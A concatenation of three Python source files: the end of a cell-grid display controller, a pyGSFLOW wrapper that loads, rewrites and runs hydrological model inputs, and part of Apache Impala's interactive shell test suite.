self._server.send(cmd)
def set_cell(self, cell):
cmd = "2,{},{},{},{},{}\n"
cmd = cmd.format(
cell.col,
cell.row,
cell.colour.str_argb,
"1" if cell.border else "0",
"1" if cell.visible else "0",
)
print(cmd)
self._server.send(cmd)
def __str__(self):
return "cols = {}, rows = {}, border = {}, visible = {}, colour = {}".format(self._col, self._row, self._border, self._visible, self._colour)
class BlueMatrixCell(object):
def __init__(self, matrix, col, row, border, visible, colour):
self._matrix = matrix
self._col = col
self._row = row
self._border = border
self._visible = visible
self._colour = colour
#PROPERTIES
@property
def col(self):
return self._col
@property
def row(self):
return self._row
@property
def colour(self):
return self._colour
@colour.setter
def colour(self, value):
self._colour = value
@property
def border(self):
return self._border
@border.setter
def border(self, value):
self._border = value
@property
def visible(self):
return self._visible
@visible.setter
def visible(self, value):
self._visible = value
@property
def modified(self):
if self._border == self._matrix.border and self._colour == self._matrix.colour and self._visible == self._matrix.visible:
return False
else:
return True
def __str__(self):
return "({},{}), border = {}, visible = {}, colour = {}".format(self._col, self._row, self._border, self._visible, self._colour)
bm = BlueMatrix(cols = 10, rows = 10)
bm.colour = BLACK
bm.border = False
bm.cell(3,3).visible = False
bm.cell(9, 9).colour = RED
bm.cell(4, 4).border = False
bm.cell(9, 9).border = False
bm.cell(1,1).visible = False
bm.cell(4,3).visible = False
bm.cell(6, 7).colour = GREEN
bm.cell(0,1).visible = False
from signal import pause
pause() |
gsflow.py | # -*- coding: utf-8 -*-
import os, sys
import logging
from .control import Control
from .prms import Prms
from .supports import _get_file_abs
from .prms_help import Helper
import flopy
import subprocess as sp
if sys.version_info > (3, 0):
import queue as Queue
else:
import Queue
from datetime import datetime
import threading
def load(control_file):
gs = Gsflow(control_file=control_file)
gs.load()
return gs
class Gsflow():
def __init__(self, control_file=None, prms=None, mf=None, mf_load_only=None,
prms_load_only=None, gsflow_exe=None):
print ("PyGSFLOW ------ V0.0")
self.Help = Helper()
self.control_file = os.path.abspath(control_file)
self.ws = None
self.mf_load_only = mf_load_only
self.prms_load_only = prms_load_only
if gsflow_exe == None:
self.gsflow_exe = os.path.join(os.path.dirname(__file__), r"bin\gsflow.exe")
else:
self.gsflow_exe = gsflow_exe
# initialize prms
if prms and isinstance(prms, Prms):
self.prms = prms
else:
self.prms = None
# todo: generate a message
# inialize flopy
if mf and isinstance(mf, flopy.modflow.Modflow):
self.mf = mf
else:
self.mf = None
# todo: generate an error
self.load()
def load(self):
# load control file
if not (os.path.isfile(self.control_file)):
raise ValueError("Cannot find control file")
self.control = Control(control_file=self.control_file)
print("Control file is loaded")
# load prms
print("Working on loading PRMS model ...")
self.prms = Prms(control=self.control)
# load modflow
mode = self.control.get_values('model_mode')
if 'GSFLOW' in mode[0] or 'MODFLOW' in mode[0]:
print ("Working on loading MODFLOW files ....")
fname = self.control.get_values('modflow_name')
fname = _get_file_abs(control_file=self.control_file, fn=fname[0])
self._load_modflow(fname)
self.mf.namefile = os.path.basename(self.control.get_values('modflow_name')[0])
else:
print ("There are no Modflow files, PRMS model only")
def _load_modflow(self, fname):
"""
The package files in the .nam file are relative to the gsflow executable. So here, we generate a temp .nam
file that has the absolute file paths
:return:
"""
fidr = open(fname, 'r')
content = fidr.readlines()
fidr.close()
temp_fn = os.path.basename(fname).split('.')[0] + "_gsflow_temp_.nam"
mf_dir = os.path.dirname(fname)
temp_fn = os.path.join(mf_dir, temp_fn)
fidw = open(temp_fn, 'w')
for line in content:
line = line.strip()
if len(line) == 0 or line[0] == '#':
continue
parts = line.split()
pkg_nm = parts[0]
pkg_un = parts[1]
pkg_fn = parts[2]
pkg_fn = os.path.basename(pkg_fn)
# pkg_fn = os.path.join(mf_dir,pkg_fn)
txt = "{} {} {}\n".format(pkg_nm, pkg_un, pkg_fn)
fidw.write(txt)
fidw.close()
bas_nam = os.path.basename(temp_fn)
self.mf = flopy.modflow.Modflow.load(temp_fn, model_ws=mf_dir)
print ("MOSFLOW files are loaded ... ")
# def change_ws(self, ws):
#
# if os.path.isdir(ws):
# print("Warning: The {} directory already exists".format(ws))
# parent_folder = os.path.dirname(ws)
#
# if not (os.path.isdir(parent_folder)):
# raise ValueError(" The parent directory {} doesn't exist...".format(parent_folder))
#
# if not (os.path.isdir(ws)):
# os.mkdir(ws)
#
# self.ws = ws
#
# # change control file location
# fnn = os.path.basename(self.control.control_file)
# self.control.control_file = os.path.join(self.ws, fnn)
#
# # change parameters
# for par_record in self.prms.Parameters.parameters_list:
# curr_file = os.path.basename(par_record.file_name)
# curr_file = os.path.join(self.ws, curr_file)
# par_record.file_name = curr_file
#
# # change datafile
# curr_file = os.path.basename(self.prms.Data.data_file)
# curr_file = os.path.join(self.ws, curr_file)
# self.prms.Data.data_file = curr_file
#
# # change mf
# if not (self.mf == None):
# self.mf.change_model_ws(self.ws)
# def change_base_file_name(self, filename):
# # change control file location
# cnt_file = filename + "_cnt" + ".control"
# dir__ = os.path.dirname(self.control.control_file)
# self.control.control_file = os.path.join(dir__, cnt_file)
#
# # change parameters
# for index, par_record in enumerate(self.prms.Parameters.parameters_list):
# curr_file = os.path.basename(par_record.file_name)
# curr_file = os.path.join(self.ws, curr_file)
# par_record.file_name = curr_file
#
# # change datafile
# curr_file = os.path.basename(self.prms.Data.data_file)
# curr_file = os.path.join(self.ws, curr_file)
# self.prms.Data.data_file = curr_file
# pass
def _get_relative_path(self, fn):
"""
If relative files are used, they should be relative to the control file
:return: relative path with respect to control file
"""
control_file_abs = os.path.abspath(self.control_file)
fn_abs = os.path.abspath(fn)
# find common path
rel_dir = os.path.relpath(os.path.dirname(fn_abs), os.path.dirname(control_file_abs))
rel_path = os.path.join(rel_dir, os.path.basename(fn))
return rel_path
# def _mk_dir(self, dir_):
# if not (os.path.isdir(dir_)):
# os.mkdir(dir_)
# else:
# print(" Warning: the directory exists {}".format(dir_))
def write_input(self, basename=None, workspace=None):
"""
:param basename:
:param workspace:
:return:
Write input files for gsflow. Four cases are possible:
(1) if basename and workspace are None, then the existing files will be overwritten
(2) if only basename is specified, only the file names will be changed
(3) if only workspace is specified, only the folder will be changed
(4) when both basename and workspace are specified, both the file names and the folder are changed
"""
# overwrite
print("Writing the project files .....")
if not (workspace == None):
workspace = os.path.abspath(workspace)
if basename == None and workspace == None:
print("Warning: input files will be overwritten....")
self._write_all()
return
# only change the directory
if (basename == None) and (not (workspace == None)):
if not (os.path.isdir(workspace)):
os.mkdir(workspace)
fnn = os.path.basename(self.control.control_file)
self.control.control_file = os.path.join(workspace, fnn)
self.control_file = os.path.join(workspace, fnn)
self.prms.control_file = self.control_file
# change parameters
new_param_file_list = []
for par_record in self.prms.parameters.parameters_list:
curr_file = os.path.basename(par_record.file_name)
curr_file = os.path.join(workspace, curr_file)
par_record.file_name = curr_file
if not (curr_file in new_param_file_list):
new_param_file_list.append(curr_file)
self.control.set_values('param_file', new_param_file_list)
# change datafile
curr_file = os.path.basename(self.prms.Data.data_file[0])
curr_file = os.path.join(workspace, curr_file)
self.prms.Data.data_file = curr_file
self.control.set_values('data_file', [curr_file])
# change mf
if not (self.mf == None):
self.mf.change_model_ws(workspace)
nmfile = os.path.basename(self.mf.name)
self.mf.name = os.path.join(self.mf.model_ws, nmfile)
out_files_list = []
for out_file in self.mf.output_fnames:
ext = out_file.split(".")[-1]
if out_file.count('.') > 1:
ext = out_file.split(".")
del ext[0]
ext = ".".join(ext)
#new_outfn = os.path.join(workspace, basename + "." + ext)
new_outfn = nmfile + "." + ext
out_files_list.append(new_outfn)
self.mf.output_fnames = out_files_list
mfnm = self.mf.name + ".nam"
self.control.set_values('modflow_name', [mfnm])
# update file names in control object
for rec_name in self.control._gslow_files:
if rec_name in self.control._record_names:
file_values = self.control.get_values(rec_name)
file_value = []
for fil in file_values:
cnt_dir = os.path.dirname(self.control_file)
va = os.path.join(workspace, os.path.basename(fil))
file_value.append(va)
self.control.set_values(rec_name, file_value)
# write
self.prms.control = self.control
self._write_all()
return
# only change the basename
if (not (basename == None)) and (workspace == None):
cnt_file = basename + "_cont.control"
ws_ = os.path.dirname(self.control.control_file)
self.control.control_file = os.path.join(ws_, cnt_file)
self.control_file = os.path.join(ws_, cnt_file)
self.prms.control_file = self.control_file
# change parameters
flist = self.prms.parameters.parameter_files
new_param_file_list = []
for ifile, par_record in enumerate(self.prms.parameters.parameters_list):
file_index = flist.index(par_record.file_name)
par_file = basename + "_par_{}.params".format(file_index)
curr_dir = os.path.dirname(par_record.file_name)
curr_file = os.path.join(curr_dir, par_file)
par_record.file_name = curr_file
if not (curr_file in new_param_file_list):
new_param_file_list.append(curr_file)
self.control.set_values('param_file', new_param_file_list)
# change datafile
dfile = basename + "_dat.data"
curr_dir = os.path.dirname(self.prms.Data.data_file)
curr_file = os.path.join(curr_dir, dfile)
self.prms.Data.data_file = curr_file
self.control.set_values('data_file', [curr_file])
# change mf
if not (self.mf == None):
curr_dir = self.mf.model_ws
#self.mf.name = os.path.join(curr_dir, basename)
self.mf.name = os.path.join(curr_dir, basename)
out_files_list = []
for out_file in self.mf.output_fnames:
ext = out_file.split(".")[-1]
if out_file.count('.') > 1:
ext = out_file.split(".")
del ext[0]
ext = ".".join(ext)
#new_outfn = os.path.join(workspace, basename + "." + ext)
new_outfn = basename + "." + ext
out_files_list.append(new_outfn)
self.mf.output_fnames = out_files_list
mfnm = self.mf.name + ".nam"
self.control.set_values('modflow_name',[mfnm])
# update file names in control object
for rec_name in self.control._gslow_files:
if rec_name in self.control._record_names:
if rec_name in ['modflow_name', 'param_file', 'data_file']:
continue
file_values = self.control.get_values(rec_name)
file_value = []
for fil in file_values:
dir_name = os.path.dirname(fil)
if rec_name == 'modflow_name':
mfname = basename + ".nam"
filvalue = os.path.join(dir_name, mfname)
else:
vvfile = rec_name.split("_")
del vvfile[-1]
vvfile = "_".join(vvfile)
if "." in fil:
ext = fil.split(".")[-1]
else:
ext = "dat"
#ext = fil.split(".")[-1]
vvfile = basename + "_" + vvfile + "." + ext
filvalue = os.path.join(dir_name, vvfile)
file_value.append(filvalue)
self.control.set_values(rec_name, file_value)
self.prms.control = self.control
self._write_all()
return
# change both directory & basename
if (not (basename == None)) and (not (workspace == None)):
if not (os.path.isdir(workspace)):
os.mkdir(workspace)
cnt_file = basename + "_cont.control"
self.control.control_file = os.path.join(workspace, cnt_file)
self.prms.control_file = self.control.control_file
self.control_file = self.control.control_file
# change parameters
## get param files list
flist = self.prms.parameters.parameter_files
new_param_file_list = []
for ifile, par_record in enumerate(self.prms.parameters.parameters_list):
file_index = flist.index(par_record.file_name)
par_file = basename + "_par_{}.params".format(file_index)
curr_file = os.path.join(workspace, par_file)
par_record.file_name = curr_file
if not (curr_file in new_param_file_list):
new_param_file_list.append(curr_file)
self.control.set_values('param_file', new_param_file_list)
# change datafile
dfile = basename + "_dat.data"
curr_file = os.path.join(workspace, dfile)
self.prms.Data.data_file = curr_file
self.control.set_values('data_file', [curr_file])
# change mf
if not (self.mf == None):
self.mf.change_model_ws(workspace)
self.mf.name = os.path.join(workspace, basename)
out_files_list = []
for out_file in self.mf.output_fnames:
ext = out_file.split(".")[-1]
if out_file.count('.') > 1:
ext = out_file.split(".")
del ext[0]
ext = ".".join(ext)
#new_outfn = os.path.join(workspace, basename + "." + ext)
new_outfn = basename + "." + ext
out_files_list.append(new_outfn)
self.mf.output_fnames = out_files_list
mfnm = basename + ".nam"
self.control.set_values('modflow_name', [os.path.join(workspace, mfnm)])
## TODO: Update control file
# update file names in control object
for rec_name in self.control._gslow_files:
if rec_name in self.control._record_names:
if rec_name in ['modflow_name', 'param_file', 'data_file']:
continue
file_values = self.control.get_values(rec_name)
file_value = []
for fil in file_values:
dir_name = os.path.dirname(fil)
if rec_name == 'modflow_name':
mfname = basename + ".nam"
filvalue = os.path.join(dir_name, mfname)
elif rec_name == 'param_file':
continue
elif rec_name == 'data_file':
continue
else:
vvfile = rec_name.split("_")
del vvfile[-1]
vvfile = "_".join(vvfile)
if "." in fil:
ext = fil.split(".")[-1]
else:
ext = "dat"
vvfile = basename + "_" + vvfile + "." + ext
filvalue = os.path.join(workspace, vvfile)
file_value.append(filvalue)
self.control.set_values(rec_name, file_value)
self.prms.control = self.control
self._write_all()
return
def _write_all(self):
# write control
print("Control file is written...")
self.control.write()
# self write parameters
print("Parameters files are written...")
self.prms.parameters.write()
# write data
print("Data file is written...")
self.prms.Data.write()
# write mf
print("Modflow files are written...")
if not (self.mf == None):
self.mf.write_input()
def run_model(self):
fn = self.control_file
cnt_folder = os.path.dirname(fn)
fnm = os.path.abspath(fn)
if not os.path.isfile(self.gsflow_exe):
print ("Warning : The executable of the model is not specified. Use .gsflow_exe "
"to define its path... ")
return None
self.__run(exe_name=self.gsflow_exe, namefile=fn)
def _generate_batch_file(self):
fn = os.path.dirname(self.control_file)
fn = os.path.join(fn, "__run_gsflow.bat")
self.__bat_file = fn
fidw = open(fn, 'w')
cmd = self.gsflow_exe + " " + self.control_file
fidw.write(cmd)
fidw.close()
def __run(self, exe_name, namefile, model_ws='./',
silent=False, pause=False, report=False,
normal_msg='normal termination',
use_async=False, cargs=None):
"""
This function will run the model using subprocess.Popen. It
communicates with the model's stdout asynchronously and reports
progress to the screen with timestamps
Parameters
----------
exe_name : str
Executable name (with path, if necessary) to run.
namefile : str
Namefile of model to run. The namefile must be the
filename of the namefile without the path.
model_ws : str
Path to the location of the namefile. (default is the
current working directory - './')
silent : boolean
Echo run information to screen (default is True).
pause : boolean, optional
Pause upon completion (default is False).
report : boolean, optional
Save stdout lines to a list (buff) which is returned
by the method . (default is False).
normal_msg : str
Normal termination message used to determine if the
run terminated normally. (default is 'normal termination')
use_async : boolean
asynchronously read model stdout and report with timestamps. good for
models that take long time to run. not good for models that run
really fast
cargs : str or list of strings
additional command line arguments to pass to the executable.
Default is None
Returns
-------
(success, buff)
success : boolean
buff : list of lines of stdout
"""
def is_exe(fpath):
return os.path.isfile(fpath) and os.access(fpath, os.X_OK)
def which(program):
fpath, fname = os.path.split(program)
if fpath:
if is_exe(program):
return program
else:
# test for exe in current working directory
if is_exe(program):
return program
# test for exe in path statement
for path in os.environ["PATH"].split(os.pathsep):
path = path.strip('"')
exe_file = os.path.join(path, program)
if is_exe(exe_file):
return exe_file
return None
success = False
buff = []
# convert normal_msg to lower case for comparison
if isinstance(normal_msg, str):
normal_msg = [normal_msg.lower()]
elif isinstance(normal_msg, list):
for idx, s in enumerate(normal_msg):
normal_msg[idx] = s.lower()
# Check to make sure that program and namefile exist
exe = which(exe_name)
if exe is None:
import platform
if platform.system() in 'Windows':
if not exe_name.lower().endswith('.exe'):
exe = which(exe_name + '.exe')
if exe is None:
s = 'The program {} does not exist or is not executable.'.format(
exe_name)
raise Exception(s)
else:
if not silent:
s = 'pyGSFLOW is using the following executable to run the model: {}'.format(
exe)
print(s)
if not os.path.isfile(os.path.join(model_ws, namefile)):
s = 'The namefile for this model does not exists: {}'.format(namefile)
raise Exception(s)
# simple little function for the thread to target
def q_output(output, q):
for line in iter(output.readline, b''):
q.put(line)
# time.sleep(1)
# output.close()
# create a list of arguments to pass to Popen
argv = [exe_name, namefile]
# add additional arguments to Popen arguments
if cargs is not None:
if isinstance(cargs, str):
cargs = [cargs]
for t in cargs:
argv.append(t)
# run the model with Popen
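# Note: the argv list assembled above is discarded at this point; the run is
# instead driven by a generated batch file that wraps "<gsflow_exe> <control_file>".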
self._generate_batch_file()
argv = self.__bat_file
model_ws = os.path.dirname(self.control_file)
proc = sp.Popen(argv,
stdout=sp.PIPE, stderr=sp.STDOUT, cwd=model_ws)
if not use_async:
while True:
line = proc.stdout.readline()
c = line.decode('utf-8')
if c != '':
for msg in normal_msg:
if msg in c.lower():
success = True
break
c = c.rstrip('\r\n')
if not silent:
print('{}'.format(c))
if report == True:
buff.append(c)
else:
break
return success, buff
# some tricks for the async stdout reading
q = Queue.Queue()
thread = threading.Thread(target=q_output, args=(proc.stdout, q))
thread.daemon = True
thread.start()
failed_words = ["fail", "error"]
last = datetime.now()
lastsec = 0.
while True:
try:
line = q.get_nowait()
except Queue.Empty:
pass
else:
if line == '':
break
line = line.decode().lower().strip()
if line != '':
now = datetime.now()
dt = now - last
tsecs = dt.total_seconds() - lastsec
line = "(elapsed:{0})-->{1}".format(tsecs, line)
lastsec = tsecs + lastsec
buff.append(line)
if not silent:
print(line)
for fword in failed_words:
if fword in line:
success = False
break
if proc.poll() is not None:
break
proc.wait()
thread.join(timeout=1)
buff.extend(proc.stdout.readlines())
proc.stdout.close()
for line in buff:
if any(msg in line for msg in normal_msg):
print("success")
success = True
break
if pause:
input('Press Enter to continue...')
return success, buff
|
test_shell_interactive.py | #!/usr/bin/env impala-python
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import httplib
import logging
import os
import pexpect
import pytest
import re
import signal
import socket
import sys
import threading
from time import sleep
# This import is the actual ImpalaShell class from impala_shell.py.
# We rename it to ImpalaShellClass here because we later import another
# class called ImpalaShell from tests/shell/util.py, and we don't want
# to mask it.
from shell.impala_shell import ImpalaShell as ImpalaShellClass
from tempfile import NamedTemporaryFile
from tests.common.impala_service import ImpaladService
from tests.common.impala_test_suite import ImpalaTestSuite
from tests.common.skip import SkipIfLocal
from tests.common.test_dimensions import create_client_protocol_dimension
from tests.shell.util import get_unused_port
from util import (assert_var_substitution, ImpalaShell, get_impalad_port, get_shell_cmd,
get_open_sessions_metric, IMPALA_SHELL_EXECUTABLE, spawn_shell)
import SimpleHTTPServer
import SocketServer
QUERY_FILE_PATH = os.path.join(os.environ['IMPALA_HOME'], 'tests', 'shell')
# Regex to match the interactive shell prompt that is expected after each command.
# Examples: hostname:21000, hostname:21050, hostname:28000
PROMPT_REGEX = r'\[[^:]+:2(1|8)0[0-9][0-9]\]'
LOG = logging.getLogger('test_shell_interactive')
@pytest.fixture
def tmp_history_file(request):
"""
Test fixture which uses a temporary file as the path for the shell
history.
"""
tmp = NamedTemporaryFile()
old_path = os.environ.get('IMPALA_HISTFILE')
os.environ['IMPALA_HISTFILE'] = tmp.name
def cleanup():
if old_path is not None:
os.environ['IMPALA_HISTFILE'] = old_path
else:
del os.environ['IMPALA_HISTFILE']
request.addfinalizer(cleanup)
return tmp.name
class RequestHandler503(SimpleHTTPServer.SimpleHTTPRequestHandler):
"""A custom http handler that checks for duplicate 'Host' headers from the most
recent http request, and always returns a 503 http code."""
def __init__(self, request, client_address, server):
SimpleHTTPServer.SimpleHTTPRequestHandler.__init__(self, request, client_address,
server)
def should_send_body_text(self):
# in RequestHandler503 we do not send any body text
return False
def do_POST(self):
# The unfortunately named self.headers here is an instance of mimetools.Message that
# contains the request headers.
request_headers = self.headers.headers
# Ensure that only one 'Host' header is contained in the request before responding.
host_hdr_count = sum([header.startswith('Host:') for header in request_headers])
assert host_hdr_count == 1, "duplicate 'Host:' headers in %s" % request_headers
# Respond with 503.
self.send_response(code=httplib.SERVICE_UNAVAILABLE, message="Service Unavailable")
if self.should_send_body_text():
# Optionally send body text with the 503 message.
self.end_headers()
self.wfile.write("EXTRA")
class RequestHandler503Extra(RequestHandler503):
""""Override RequestHandler503 so as to send body text with the 503 message."""
def __init__(self, request, client_address, server):
RequestHandler503.__init__(self, request, client_address, server)
def should_send_body_text(self):
# in RequestHandler503Extra we will send body text
return True
class TestHTTPServer503(object):
def __init__(self, clazz):
self.HOST = "localhost"
self.PORT = get_unused_port()
self.httpd = SocketServer.TCPServer((self.HOST, self.PORT), clazz)
self.http_server_thread = threading.Thread(target=self.httpd.serve_forever)
self.http_server_thread.start()
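# The serve_forever() thread is not a daemon thread, so callers must use
# shutdown_server() below to stop the server and join the thread when done.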
def shutdown_server(server):
"""Helper method to shutdown a http server."""
if server.httpd is not None:
server.httpd.shutdown()
if server.http_server_thread is not None:
server.http_server_thread.join()
@pytest.yield_fixture
def http_503_server():
"""A fixture that creates an http server that returns a 503 http code."""
server = TestHTTPServer503(RequestHandler503)
yield server
# Cleanup after test.
shutdown_server(server)
@pytest.yield_fixture
def http_503_server_extra():
"""A fixture that creates an http server that returns a 503 http code with extra
body text."""
server = TestHTTPServer503(RequestHandler503Extra)
yield server
# Cleanup after test.
shutdown_server(server)
class TestImpalaShellInteractive(ImpalaTestSuite):
"""Test the impala shell interactively"""
@classmethod
def get_workload(self):
return 'functional-query'
@classmethod
def add_test_dimensions(cls):
# Run with both beeswax and HS2 to ensure that behaviour is the same.
cls.ImpalaTestMatrix.add_dimension(create_client_protocol_dimension())
def _expect_with_cmd(self, proc, cmd, vector, expectations=(), db="default"):
"""Executes a command on the expect process instance and verifies a set of
assertions defined by the expectations."""
proc.sendline(cmd + ";")
proc.expect(":{0}] {1}>".format(get_impalad_port(vector), db))
if not expectations: return
for e in expectations:
assert e in proc.before
def _wait_for_num_open_sessions(self, vector, impala_service, expected, err):
"""Helper method to wait for the number of open sessions to reach 'expected'."""
metric_name = get_open_sessions_metric(vector)
try:
actual = impala_service.wait_for_metric_value(metric_name, expected)
except AssertionError:
LOG.exception("Error: %s" % err)
raise
assert actual == expected, err
def test_local_shell_options(self, vector):
"""Test that setting the local shell options works"""
proc = spawn_shell(get_shell_cmd(vector))
proc.expect(":{0}] default>".format(get_impalad_port(vector)))
self._expect_with_cmd(proc, "set", vector,
("LIVE_PROGRESS: True", "LIVE_SUMMARY: False"))
self._expect_with_cmd(proc, "set live_progress=true", vector)
self._expect_with_cmd(proc, "set", vector,
("LIVE_PROGRESS: True", "LIVE_SUMMARY: False"))
self._expect_with_cmd(proc, "set live_summary=1", vector)
self._expect_with_cmd(proc, "set", vector,
("LIVE_PROGRESS: True", "LIVE_SUMMARY: True"))
self._expect_with_cmd(proc, "set", vector,
("WRITE_DELIMITED: False", "VERBOSE: True"))
self._expect_with_cmd(proc, "set", vector,
("DELIMITER: \\t", "OUTPUT_FILE: None"))
self._expect_with_cmd(proc, "set write_delimited=true", vector)
self._expect_with_cmd(proc, "set", vector, ("WRITE_DELIMITED: True", "VERBOSE: True"))
self._expect_with_cmd(proc, "set DELIMITER=,", vector)
self._expect_with_cmd(proc, "set", vector, ("DELIMITER: ,", "OUTPUT_FILE: None"))
self._expect_with_cmd(proc, "set output_file=/tmp/clmn.txt", vector)
self._expect_with_cmd(proc, "set", vector,
("DELIMITER: ,", "OUTPUT_FILE: /tmp/clmn.txt"))
proc.sendeof()
proc.wait()
@pytest.mark.execute_serially
def test_write_delimited(self, vector):
"""Test output rows in delimited mode"""
p = ImpalaShell(vector)
p.send_cmd("use tpch")
p.send_cmd("set write_delimited=true")
p.send_cmd("select * from nation")
result = p.get_result()
assert "+----------------+" not in result.stdout
assert "21\tVIETNAM\t2" in result.stdout, result.stdout
@pytest.mark.execute_serially
def test_change_delimiter(self, vector):
"""Test change output delimiter if delimited mode is enabled"""
p = ImpalaShell(vector)
p.send_cmd("use tpch")
p.send_cmd("set write_delimited=true")
p.send_cmd("set delimiter=,")
p.send_cmd("select * from nation")
result = p.get_result()
assert "21,VIETNAM,2" in result.stdout
@pytest.mark.execute_serially
def test_print_to_file(self, vector):
"""Test print to output file and unset"""
# test print to file
p1 = ImpalaShell(vector)
p1.send_cmd("use tpch")
local_file = NamedTemporaryFile(delete=True)
p1.send_cmd("set output_file=%s" % local_file.name)
p1.send_cmd("select * from nation")
result = p1.get_result()
assert "VIETNAM" not in result.stdout
with open(local_file.name, "r") as fi:
# check if the results were written to the file successfully
result = fi.read()
assert "VIETNAM" in result
# test unset to print back to stdout
p2 = ImpalaShell(vector)
p2.send_cmd("use tpch")
p2.send_cmd("set output_file=%s" % local_file.name)
p2.send_cmd("unset output_file")
p2.send_cmd("select * from nation")
result = p2.get_result()
assert "VIETNAM" in result.stdout
def test_compute_stats_with_live_progress_options(self, vector, unique_database):
"""Test that setting LIVE_PROGRESS options won't cause COMPUTE STATS query fail"""
p = ImpalaShell(vector)
p.send_cmd("set live_progress=True")
p.send_cmd("set live_summary=True")
table = "{0}.live_progress_option".format(unique_database)
p.send_cmd('create table {0}(col int);'.format(table))
try:
p.send_cmd('compute stats {0};'.format(table))
finally:
p.send_cmd('drop table if exists {0};'.format(table))
result = p.get_result()
assert "Updated 1 partition(s) and 1 column(s)" in result.stdout
def test_escaped_quotes(self, vector):
"""Test escaping quotes"""
# test escaped quotes outside of quotes
result = run_impala_shell_interactive(vector, "select \\'bc';")
assert "Unexpected character" in result.stderr
result = run_impala_shell_interactive(vector, "select \\\"bc\";")
assert "Unexpected character" in result.stderr
# test escaped quotes within quotes
result = run_impala_shell_interactive(vector, "select 'ab\\'c';")
assert "Fetched 1 row(s)" in result.stderr
result = run_impala_shell_interactive(vector, "select \"ab\\\"c\";")
assert "Fetched 1 row(s)" in result.stderr
@pytest.mark.execute_serially
def test_cancellation(self, vector):
impalad = ImpaladService(socket.getfqdn())
assert impalad.wait_for_num_in_flight_queries(0)
command = "select sleep(10000);"
p = ImpalaShell(vector)
p.send_cmd(command)
sleep(3)
os.kill(p.pid(), signal.SIGINT)
result = p.get_result()
assert "Cancelled" not in result.stderr
assert impalad.wait_for_num_in_flight_queries(0)
p = ImpalaShell(vector)
sleep(3)
os.kill(p.pid(), signal.SIGINT)
result = p.get_result()
assert "^C" in result.stderr
@pytest.mark.execute_serially
def test_cancellation_mid_command(self, vector):
"""Test that keyboard interrupt cancels multiline query strings"""
shell_cmd = get_shell_cmd(vector)
multiline_query = ["select column_1\n", "from table_1\n", "where ..."]
# Test keyboard interrupt mid line
child_proc = spawn_shell(shell_cmd)
child_proc.expect(PROMPT_REGEX)
for query_line in multiline_query:
child_proc.send(query_line)
child_proc.sendintr()
child_proc.expect("\^C")
child_proc.expect(PROMPT_REGEX)
child_proc.sendline('quit;')
child_proc.wait()
# Test keyboard interrupt in new line
child_proc = spawn_shell(shell_cmd)
child_proc.expect(PROMPT_REGEX)
for query_line in multiline_query:
child_proc.send(query_line)
child_proc.send("\n")
child_proc.expect(">")
child_proc.sendintr()
child_proc.expect("> \^C")
child_proc.expect(PROMPT_REGEX)
child_proc.sendline('quit;')
child_proc.wait()
def test_unicode_input(self, vector):
"Test queries containing non-ascii input"
# test a unicode query spanning multiple lines
unicode_text = u'\ufffd'
args = "select '%s'\n;" % unicode_text.encode('utf-8')
result = run_impala_shell_interactive(vector, args)
assert "Fetched 1 row(s)" in result.stderr
def test_welcome_string(self, vector):
"""Test that the shell's welcome message is only printed once
when the shell is started. Ensure it is not reprinted on errors.
Regression test for IMPALA-1153
"""
result = run_impala_shell_interactive(vector, 'asdf;')
assert result.stdout.count("Welcome to the Impala shell") == 1
result = run_impala_shell_interactive(vector, 'select * from non_existent_table;')
assert result.stdout.count("Welcome to the Impala shell") == 1
def test_disconnected_shell(self, vector):
"""Test that the shell presents a disconnected prompt if it can't connect
"""
result = run_impala_shell_interactive(vector, 'asdf;', shell_args=['-ifoo'],
wait_until_connected=False)
assert ImpalaShellClass.DISCONNECTED_PROMPT in result.stdout, result.stderr
def test_quit_no_reconnect(self, vector):
"""Test that a disconnected shell does not try to reconnect if quitting"""
result = run_impala_shell_interactive(vector, 'quit;', shell_args=['-ifoo'],
wait_until_connected=False)
assert "reconnect" not in result.stderr
result = run_impala_shell_interactive(vector, 'exit;', shell_args=['-ifoo'],
wait_until_connected=False)
assert "reconnect" not in result.stderr
# Null case: This is not quitting, so it will result in an attempt to reconnect.
result = run_impala_shell_interactive(vector, 'show tables;', shell_args=['-ifoo'],
wait_until_connected=False)
assert "reconnect" in result.stderr
def test_bash_cmd_timing(self, vector):
"""Test existence of time output in bash commands run from shell"""
args = ["! ls;"]
result = run_impala_shell_interactive(vector, args)
assert "Executed in" in result.stderr
@SkipIfLocal.multiple_impalad
@pytest.mark.execute_serially
def test_reconnect(self, vector):
"""Regression Test for IMPALA-1235
Verifies that a connect command by the user is honoured.
"""
try:
# Disconnect existing clients so there are no open sessions.
self.close_impala_clients()
hostname = socket.getfqdn()
initial_impala_service = ImpaladService(hostname)
target_impala_service = ImpaladService(hostname, webserver_port=25001,
beeswax_port=21001, hs2_port=21051, hs2_http_port=28001)
protocol = vector.get_value("protocol").lower()
if protocol == "hs2":
target_port = 21051
elif protocol == "hs2-http":
target_port = 28001
else:
assert protocol == "beeswax"
target_port = 21001
# This test is running serially, so there shouldn't be any open sessions, but wait
# here in case a session from a previous test hasn't been fully closed yet.
self._wait_for_num_open_sessions(vector, initial_impala_service, 0,
"first impalad should not have any remaining open sessions.")
self._wait_for_num_open_sessions(vector, target_impala_service, 0,
"second impalad should not have any remaining open sessions.")
# Connect to the first impalad
p = ImpalaShell(vector)
# Make sure we're connected <hostname>:<port>
self._wait_for_num_open_sessions(vector, initial_impala_service, 1,
"Not connected to %s:%d" % (hostname, get_impalad_port(vector)))
p.send_cmd("connect %s:%d" % (hostname, target_port))
# The number of sessions on the target impalad should have been incremented.
self._wait_for_num_open_sessions(vector,
target_impala_service, 1, "Not connected to %s:%d" % (hostname, target_port))
assert "[%s:%d] default>" % (hostname, target_port) in p.get_result().stdout
# The number of sessions on the initial impalad should have been decremented.
self._wait_for_num_open_sessions(vector, initial_impala_service, 0,
"Connection to %s:%d should have been closed" % (
hostname, get_impalad_port(vector)))
finally:
self.create_impala_clients()
@pytest.mark.execute_serially
def test_ddl_queries_are_closed(self, vector):
"""Regression test for IMPALA-1317
